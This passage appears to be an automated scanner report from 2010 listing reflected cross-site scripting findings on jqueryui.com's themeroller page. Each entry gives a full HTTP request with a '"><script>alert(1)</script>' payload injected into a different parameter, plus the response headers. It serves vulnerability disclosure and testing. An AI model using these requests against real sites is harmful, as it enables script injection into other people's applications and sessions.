GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:30:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7900c"><script>alert(1)</script>cae816e79ac was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:28:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... ult=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpac ...[SNIP]...
1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94042"><script>alert(1)</script>2f54497d769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?94042"><script>alert(1)</script>2f54497d769=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:16:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 117121
The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e5e"><script>alert(1)</script>f8b31991ec3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:34:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49af1"><script>alert(1)</script>944ac9397d5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:33:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c37"><script>alert(1)</script>d85e670a993 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:32:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd3"><script>alert(1)</script>263e02daba7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:33:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32961"><script>alert(1)</script>b72e4eb2dae was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:33:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099